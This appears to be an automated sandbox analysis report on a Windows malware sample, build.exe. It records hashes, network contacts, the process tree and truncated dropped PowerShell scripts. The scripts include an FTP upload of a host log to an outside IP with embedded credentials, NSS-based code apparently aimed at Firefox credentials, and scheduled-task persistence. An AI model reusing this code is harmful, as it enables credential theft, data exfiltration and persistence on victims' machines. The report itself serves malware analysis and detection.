Analysis Task

Analysis Type VM Label Start Time End Time Duration
File (Windows) win7-sp1-x64-hpdapp03-1 2018-09-19 17:52:20 2018-09-19 17:54:48 148 seconds

Maldun Score

10.0

Dangerous

File Details

File name build.exe
File size 240640 bytes
File type PE32+ executable (console) x86-64, for MS Windows
MD5 1680f107e9578f61355c15329f69eb4b
SHA1 a835433174cc6f081ff13b3e3582aeb303df6534
SHA256 4d749c53b4f28a2e2896f5e2d25db811c3d036605dd657d165b6baa49ae9e705
SHA512 f769aa09c782a8985b0ece4e8e67b2b8afc4ba36a73ee91897efb49360455a96458d7a2dc4dc8ed6c9dad79edd2369395c8271c745aa68e455c8c5c38158a3df
CRC32 A29F9295
Ssdeep 6144:GE9o6C0wMeewgctohHgw9BxUSE9LltYoW5E:G36C0mtoHrxIvW

Hosts Contacted

Direct IP Security Rating Location
23.23.114.123 United States
91.112.214.182 Austria

DNS Resolution

Domain Security Rating Response
api.ipify.org A 54.243.179.137
CNAME nagano-19599.herokussl.com
A 50.16.248.221
A 50.19.229.252
A 23.21.121.219
A 23.23.114.123
A 54.243.123.39
CNAME elb097307-934924932.us-east-1.elb.amazonaws.com

PE Information

Image base 0x140000000
Entry point 0x140003158
Declared checksum 0x00000000
Actual checksum 0x000407e0
Minimum OS version required 6.0
Compile time 2018-09-18 19:30:02
Import hash 012e200829394c80788807acf5c9390a

PE Sections

Name Virtual Address Virtual Size Raw Data Size Characteristics Entropy
.text 0x00001000 0x00011778 0x00011800 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.47
.rdata 0x00013000 0x0000fb02 0x0000fc00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.05
.data 0x00023000 0x000186ec 0x00017000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 7.42
.pdata 0x0003c000 0x00001194 0x00001200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.98
.gfids 0x0003e000 0x00000104 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 1.88
.tls 0x0003f000 0x00000009 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.02
.rsrc 0x00040000 0x000001e0 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.70
.reloc 0x00041000 0x00000af8 0x00000c00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 5.28

Resources

Name Offset Size Language Sublanguage Entropy File Type
RT_MANIFEST 0x00040060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US 4.91 XML 1.0 document text

Imports

Library: KERNEL32.dll:
0x140013000 SizeofResource
0x140013008 HeapFree
0x140013018 HeapSize
0x140013020 GetLastError
0x140013028 LockResource
0x140013030 HeapReAlloc
0x140013038 RaiseException
0x140013040 LoadResource
0x140013048 FindResourceW
0x140013050 HeapAlloc
0x140013058 DecodePointer
0x140013060 HeapDestroy
0x140013068 DeleteCriticalSection
0x140013070 GetProcessHeap
0x140013078 MultiByteToWideChar
0x140013080 FindResourceExW
0x140013088 FreeConsole
0x140013090 CreateFileW
0x140013098 WriteConsoleW
0x1400130a0 SetStdHandle
0x1400130a8 SetEnvironmentVariableA
0x1400130b0 FreeEnvironmentStringsW
0x1400130b8 WideCharToMultiByte
0x1400130c0 EnterCriticalSection
0x1400130c8 LeaveCriticalSection
0x1400130d0 EncodePointer
0x1400130d8 SetLastError
0x1400130e8 CreateEventW
0x1400130f0 TlsAlloc
0x1400130f8 TlsGetValue
0x140013100 TlsSetValue
0x140013108 TlsFree
0x140013110 GetSystemTimeAsFileTime
0x140013118 GetModuleHandleW
0x140013120 GetProcAddress
0x140013128 CompareStringW
0x140013130 LCMapStringW
0x140013138 GetStringTypeW
0x140013140 GetCPInfo
0x140013148 IsDebuggerPresent
0x140013150 OutputDebugStringW
0x140013158 CloseHandle
0x140013160 SetEvent
0x140013168 ResetEvent
0x140013170 WaitForSingleObjectEx
0x140013178 RtlCaptureContext
0x140013180 RtlLookupFunctionEntry
0x140013188 RtlVirtualUnwind
0x140013190 UnhandledExceptionFilter
0x1400131a0 GetCurrentProcess
0x1400131a8 TerminateProcess
0x1400131b8 GetStartupInfoW
0x1400131c0 QueryPerformanceCounter
0x1400131c8 GetCurrentProcessId
0x1400131d0 GetCurrentThreadId
0x1400131d8 InitializeSListHead
0x1400131e0 RtlPcToFileHeader
0x1400131e8 RtlUnwindEx
0x1400131f0 FreeLibrary
0x1400131f8 LoadLibraryExW
0x140013200 ExitProcess
0x140013208 GetModuleHandleExW
0x140013210 GetModuleFileNameA
0x140013218 GetStdHandle
0x140013220 WriteFile
0x140013228 GetCommandLineA
0x140013230 GetCommandLineW
0x140013238 GetACP
0x140013240 GetFileType
0x140013248 FlushFileBuffers
0x140013250 GetConsoleCP
0x140013258 GetConsoleMode
0x140013260 SetFilePointerEx
0x140013268 FindClose
0x140013270 FindFirstFileExA
0x140013278 FindNextFileA
0x140013280 IsValidCodePage
0x140013288 GetOEMCP
0x140013290 GetEnvironmentStringsW
Library: ole32.dll:
0x1400132b0 CoUninitialize
0x1400132b8 CLSIDFromProgID
0x1400132c0 CoCreateInstance
0x1400132c8 CoInitializeEx
Library: OLEAUT32.dll:
0x1400132a0 SysAllocString

No antivirus engine scan information.

Process Tree

build.exe, PID: 2516, parent PID: 2380
cmd.exe, PID: 2756, parent PID: 2516
taskkill.exe, PID: 2836, parent PID: 2516
taskkill.exe, PID: 2868, parent PID: 2516
taskkill.exe, PID: 2952, parent PID: 2516
cmd.exe, PID: 1564, parent PID: 2516
cmd.exe, PID: 2564, parent PID: 2516
cmd.exe, PID: 2804, parent PID: 2516
cmd.exe, PID: 2924, parent PID: 2516
powershell.exe, PID: 1308, parent PID: 2516

TCP

Source Address Source Port Destination Address Destination Port
192.168.122.201 49165 23.23.114.123 api.ipify.org 80
192.168.122.201 49166 23.23.114.123 api.ipify.org 80
192.168.122.201 49167 23.23.114.123 api.ipify.org 80
192.168.122.201 49168 23.23.114.123 api.ipify.org 80
192.168.122.201 49169 23.23.114.123 api.ipify.org 80
91.112.214.182 21 192.168.122.201 49178
192.168.122.201 49179 91.112.214.182 37120

UDP

Source Address Source Port Destination Address Destination Port
192.168.122.201 61941 192.168.122.1 53

HTTP Requests

URI HTTP Data
http://api.ipify.org/
GET / HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: api.ipify.org
Connection: Keep-Alive

SMTP Traffic

No SMTP traffic.

IRC Traffic

No IRC requests.

ICMP Traffic

No ICMP traffic.

CIF Report

No CIF results.

Network Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol SID Signature Category
2018-09-19 17:52:57.365203+0800 91.112.214.182 21 192.168.122.201 49178 TCP 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
2018-09-19 17:52:47.946077+0800 192.168.122.201 49169 23.23.114.123 80 TCP 2021997 ET POLICY External IP Lookup api.ipify.org Potential Corporate Privacy Violation
2018-09-19 17:52:47.273909+0800 192.168.122.201 49168 23.23.114.123 80 TCP 2021997 ET POLICY External IP Lookup api.ipify.org Potential Corporate Privacy Violation
2018-09-19 17:52:46.312625+0800 192.168.122.201 49166 23.23.114.123 80 TCP 2021997 ET POLICY External IP Lookup api.ipify.org Potential Corporate Privacy Violation
2018-09-19 17:52:45.860509+0800 192.168.122.201 49165 23.23.114.123 80 TCP 2021997 ET POLICY External IP Lookup api.ipify.org Potential Corporate Privacy Violation
2018-09-19 17:52:46.794717+0800 192.168.122.201 49167 23.23.114.123 80 TCP 2021997 ET POLICY External IP Lookup api.ipify.org Potential Corporate Privacy Violation

TLS

No TLS

Suricata HTTP

No Suricata HTTP

No files extracted from network traffic.

File name 590aee7bdd69b59b.customDestinations-ms
Related file
C:\Users\test\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
File size 7960 bytes
File type data
MD5 7f011366e63a75160f463b4e50fce6e9
SHA1 48243f89da9c5c28f6ca37c22a9f6c7e0ec4eff0
SHA256 cf2b29afd8950689c52611272a3ae15cfb1b966a1081e70d53eeeb15f6006ecf
CRC32 FCC4A063
Ssdeep 96:GWCP9MefqvsqvJCwooWvWCP9MefqvsEHyqvJCwowyMWwz+GHOGplUV+:GR9yooWvR96HnownWwEGL
File name prefs.js
Related file
C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
File size 19320 bytes
File type ASCII text, with very long lines, with CRLF, LF line terminators
MD5 86fb36cab2b70a350ebc55764bfdc1ce
SHA1 6bdb6a37333e7e7b1cb6a0e505ec44369c19624a
SHA256 ab8e4b32f032bb11eb7a44d92461bf4306f6d23e8ffa3ca460d074dcf46d4842
CRC32 04794156
Ssdeep 192:VbzmgU5+adaIMC6EMJu6w1tHpQxKRVD5+jzYfY76D1hW3zc7l8z9oaHfivG++:RyX1tJWKH4jkQic3zule9oqfwGx
Yara
  • Detected no presence of any attachment
  • Detected no presence of any image
  • Detected the presence of an or several urls
Displayed text:
# Mozilla User Preferences

/* Do not edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 * For more information, see http://www.mozilla.org/unix/customizing.html#prefs
 */

user_pref("app.update.auto", false);
user_pref("app.update.enabled", false);
user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1504369291);
user_pref("app.update.lastUpdateTime.background-update-timer", 1496022491);
user_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 1535765397);
user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1495632979);
user_pref("app.update.lastUpdateTime.experiments-update-timer", 1494516459);
user_pref("app.update.lastUpdateTime.search-engine-update-timer", 1495633099);
user_pref("app.update.lastUpdateTime.xpi-signature-verification", 1494516821);
user_pref("app.update.service.enabled", false);
user_pref("browser.cache.disk.capacity", 358400);
user_pref("browser.cache.disk.filesystem_reported", 1);
user_pref("browser.cache.disk.smart_size.first_run", false);
user_pref("browser.cache.disk.smart_size.use_old_max", false);
user_pref("browser.cache.disk.smart_size_cached_value", 624640);
user_pref("browser.cache.frecency_experiment", 2);
user_pref("browser.download.importedFromSqlite", true);
user_pref("browser.link.open_newwindow", 2);
user_pref("browser.migrated-sync-button", true);
user_pref("browser.migration.version", 37);
user_pref("browser.newtabpage.enhanced", true);
user_pref("browser.newtabpage.storageVersion", 1);
user_pref("browser.offline-apps.notify", false);
user_pref("browser.pagethumbnails.storage_version", 3);
user_pref("browser.places.smartBookmarksVersion", 7);
user_pref("browser.preferences.advanced.selectedTabIndex", 0);
user_pref("browser.rights.3.shown", true);
user_pref("browser.safebrowsing.enabled", false);
user_pref("brows <truncated>
File name 4T1URnT.ps1
Related file
C:\ProgramData\4T1URnT.ps1
File size 7840 bytes
File type ASCII text, with very long lines
MD5 73641e857a0402982c7c49497988bd1a
SHA1 e3d97e1e93d3abea271f744d6685823822549fd2
SHA256 7f754d568be48a27c1753b782f868eac82b23dd56255b1188ea189168a080073
CRC32 5A275F72
Ssdeep 192:YFehO/hpoSDdyUIwizis3TWwcDJKqxPmQ0AtfouLbmlod0WL:YFeh2YC/Iz5vGgllsd
Displayed text:
$SH_TYPE_SCHEDULED_TASK=1;
$SH_TYPE_TASK_SCHEDULER=2;
$schedulerType=$SH_TYPE_SCHEDULED_TASK;
function mBXmzjwCLJY
{
param([string]$zipfile, [string]$destination);
$7z = Join-Path $env:ALLUSERSPROFILE '7za.exe';
if (-NOT (Test-Path $7z)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
}
Catch{}
}
if ($(Try { Test-Path $7z.trim() } Catch { $false })){
Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
function RandomString{
    param([int]$min=5, [int]$max=15);
    return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_}));
}
function InitScheduller{
    try{
        Import-Module ScheduledTasks -ErrorAction Stop;
        return $SH_TYPE_SCHEDULED_TASK;
    }catch{
        $File=$env:Temp+'\'+(RandomString)+'.zip';
        $Dest=$env:Temp+'\'+(RandomString);
        while (!(uaFSXULxO 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {}
        if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null;
        mBXmzjwCLJY $File $Dest;
        Remove-Item -Force $File;
        $TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll';
        $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
        return $SH_TYPE_TASK_SCHEDULER;
    }
}
function LQFPqwtAc
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
switch ($schedulerType) {
    $SH_TYPE_SCHEDULED_TASK {
        $Action = New-ScheduledTaskAction -Execute $cmd;
        if(-Not [String]::IsNullOrEmpty($params)){
          <truncated>
File name 4IKYPwsB.ps1
Related file
C:\Users\test\AppData\Local\Temp\4IKYPwsB.ps1
File size 2954 bytes
File type ASCII text
MD5 e846f6d85399752c2e51562b2b1fda1b
SHA1 d5478afcf056a839a3d572f20535d3789bfbc2ba
SHA256 d817e3233e95a5f7f80b4dcc45f121c3b9401ed2ca3ae5fbde168838b4a90ff4
CRC32 FFACF392
Ssdeep 48:8pGE0tr4bGE9ZMpu0oUUqxndOqCRY1hGBQWWW0WfkufCLTi4ukiXKEU:8cEm/GkOqxnoJGhGWZfokuqL+4u9Kp
Displayed text:
$Logfile = $env:Temp+"\\$(gc env:computername).log";

Function LogWrite
{
  Param ([string]$logstring)
  $dt=Get-Date -Format "dd.MM.yyyy HH:mm:ss";
  $msg=[string]::Format("[{0}]::[{1}]",$dt,$logstring);
  Write-Host $msg;
  Add-content $Logfile -value $msg;
}
Function UploadLog
{
  $dest = "ftp://Wettbewerb:mantler1220x@91.112.214.182/public_html/log";
  $webclient = New-Object -TypeName System.Net.WebClient;
  $webclient.UploadFile("$dest/$(gc env:computername).log", $Logfile);
  Remove-Item -Path $Logfile;
}
function CheckInstall(){
  $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages);
  $wininfo.MUILanguages=$wininfo.MUILanguages -join ",";
  LogWrite("OS info: {0}" -f $wininfo -join "");
  if (test-path variable:psversiontable) {
    $version = $psversiontable.psversion;
  } else {
    $version = [version]"1.0.0.0";
  }
  LogWrite("Powershell version: {0}" -f $version);
  try {
    $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop;
    LogWrite("Pac setted: '$pac'");
  }
  catch {
    LogWrite("ERROR: Pac not setted");
  }
  $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*" -or $_.Subject -like "*COMODO Certification Authority*"}|ForEach-Object {"{0} ({1})" -f ($_.Thumbprint,$_.NotBefore)});
  if (-NOT $Certs.count -eq 0){
    LogWrite("Certs installed: '{0}'" -f ($Certs -join "; "));
  }else {
    LogWrite("Certs not found");
  }
  try{
    $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out"; Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out;
    LogWrite("Proccess list:`n{0}" -f ($proc -join "`n"));
  }
  catch {
    LogWrite("ERROR: Can't get proccess list");
  }
  $DestTP=$env:ALLUSERSPROFILE;
  try{
    $dirs=dir($Dest <truncated>
File name oSzISqLc.ps1
Related file
C:\Users\test\AppData\Local\Temp\oSzISqLc.ps1
File size 16697 bytes
File type ASCII text, with very long lines
MD5 27dd3d6d9cbe3086f9372969ed3eb509
SHA1 b28705456378c643fcd14e2e93d8e3954c7f4cc9
SHA256 342b08694340c66ab5624a1408e2e04fe97a93dd187188bd7849e947e39e5c75
CRC32 E828B8FB
Ssdeep 384:VlVaeQiGvZ8mUx3ILBwuSXGgNm/G7T2Imh6H/HGDifPWBLyxh9bbIEng7y7zNL:8Lmhnln9L
Displayed text:
function zmxOnQbNYHfz{
Add-Type @"
using System;
using System.IO;
using Microsoft.Win32;
using System.Runtime.InteropServices;
using System.ComponentModel;

public sealed class AxKPAeUfXdxN
{
	private static volatile AxKPAeUfXdxN UjtfVoGeYlF;
	private static object XVsvCnlNl = new Object();
	public static AxKPAeUfXdxN ElvKLjdGNIXDuNy()
    {
        if (UjtfVoGeYlF == null)
        {
            lock (XVsvCnlNl)
            {
                if (UjtfVoGeYlF == null)
                UjtfVoGeYlF = new AxKPAeUfXdxN();
            }
        }
        return UjtfVoGeYlF;
    }
	
	const int uUamOglyct=0;
    
    [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
    static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);

    private static IntPtr HPQiihMcaW(string libPath)
    {
        if (String.IsNullOrEmpty(libPath))
            throw new ArgumentNullException("libPath");

        IntPtr moduleHandle = LoadLibrary(libPath);
        if (moduleHandle == IntPtr.Zero)
        {
            int lasterror = Marshal.GetLastWin32Error();
            System.Console.WriteLine(String.Format("Last error: 0x{0:X}",lasterror));
            Win32Exception innerEx = new Win32Exception(lasterror);
            innerEx.Data.Add("LastWin32Error", lasterror);
            throw new Exception("can't load DLL " + libPath, innerEx);
        }
        return moduleHandle;
    }

    [DllImport("kernel32.dll")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
	//Constants
    const uint NSS_INIT_READONLY=0x1;
    const uint NSS_INIT_NOCERTDB = 0x2;
    const uint NSS_INIT_NOMODDB = 0x4;
    const uint NSS_INIT_FORCEOPEN = 0x8;
    const uint NSS_INIT_NOROOTINIT = 0x10;
    const uint NSS_INIT_OPTIMIZESPACE = 0x20;
    const uint NSS_INIT_PK11THREADSAFE = 0x40;
    const uint NSS_INIT_PK11RELOAD = 0x80;
    const uint NSS_INIT_NOPK11FINALIZE = 0x100;
    const uint NSS_INIT_RESERVED = 0x200;
    const uint NSS_INIT_COOPERATE = NSS_INIT_PK11THREADSAFE | NSS_I <truncated>
File name TEST-PC.log
Related file
C:\Users\test\AppData\Local\Temp\TEST-PC.log
File size 1862 bytes
File type ISO-8859 text, with very long lines, with CRLF, LF line terminators
MD5 1f24bdcc538f2234660156420cf8ee40
SHA1 cf38a3cbc67dcf59306a9a739098ac995da73b9a
SHA256 cae594a6ef3c49c953c9d980c8a9f3fe62538052e25e3dd33744b088c4f1c3a5
CRC32 87B543B5
Ssdeep 48:oFvg2ZjWazBzl/gTX5ghgJgP1gNoZMg9g1JgUgvXsgvRghxMglK0B0s+REI2gi:oZdZSaVzFAX5gY0WoWO6JpocoROMy0pC
File name KQSnVak9.ps1
Related file
C:\Users\test\AppData\Local\Temp\KQSnVak9.ps1
File size 9677 bytes
File type ASCII text, with very long lines
MD5 995634a1d0bc0cb3a352e29e574a3c47
SHA1 723f366a107d20d2cb971b31b2a01aa8d394f663
SHA256 526298e976e7ed46f04310c99c51aeb499e28a59a682c73644114e303bd016aa
CRC32 604DA640
Ssdeep 192:UYMYUYXzfTfdM4F2InfmCc3y+JFLOKBWZsJdgQzPidaZaakYyzHzYTX1Ag7yWPqm:Ue7T7cHFLOKVJdgQzP9k4X1Ag7y7zNQ
Displayed text:
function VcyyMgvYmuCnzB{
Add-Type @"
using System;
using System.Text;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Security.Cryptography.X509Certificates;
using System.Threading;

public static class pcqEf
{
	public class XEcTYoJfPBuKg
    {
        public string Wndclass;
        public string Title;
        public string Process;
        public IntPtr hWnd;
    }

    private delegate bool PayImryPKI(IntPtr hWnd, ref XEcTYoJfPBuKg data);

    [DllImport("user32.dll")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool EnumWindows(PayImryPKI lpEnumFunc, ref XEcTYoJfPBuKg data);
	
	[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
	
	[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
	static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
	
	[DllImport("user32.dll")]
	[return: MarshalAs(UnmanagedType.Bool)]
	static extern bool SetForegroundWindow(IntPtr hWnd);
	
	public delegate bool gcdSJ(IntPtr hwnd, IntPtr lParam);
	
	[DllImport("user32")]
	[return: MarshalAs(UnmanagedType.Bool)]
	public static extern bool EnumChildWindows(IntPtr window, gcdSJ callback, IntPtr lParam);  
	
	[DllImport("user32.dll", CharSet = CharSet.Auto)]
	static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam);
	
	[Flags]
    private enum SnapshotFlags : uint
    {
    HeapList = 0x00000001,
    Process = 0x00000002,
    Thread = 0x00000004,
    Module = 0x00000008,
    Module32 = 0x00000010,
    Inherit = 0x80000000,
    All = 0x0000001F,
    NoHeaps = 0x40000000
    }
    //inner struct used only internally
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
    private struct PROCESSENTRY32
    {
    const  <truncated>
No similar analyses found.

Task ID 188774
Mongo ID 5ba21d1da093ef245f83b93a
Cuckoo release 1.4-Maldun